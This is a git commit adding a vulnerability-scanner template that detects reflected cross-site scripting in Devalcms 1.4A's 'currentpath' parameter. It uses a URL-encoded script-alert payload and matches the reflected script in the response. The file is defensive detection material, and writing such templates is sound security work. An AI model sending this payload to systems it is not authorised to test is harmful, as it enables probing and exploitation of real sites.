Merge pull request #4868 from arafatansari/patch-15

Create devalcms-xss.yaml
patch-1
Prince Chaddha 2022-07-21 15:20:18 +05:30 committed by GitHub
commit 3035ea903c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
id: devalcms-xss
info:
name: Devalcms 1.4A - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
reference:
- https://www.exploit-db.com/exploits/6369
metadata:
verified: true
tags: devalcms,xss,cms
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'sub menu for: <script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 500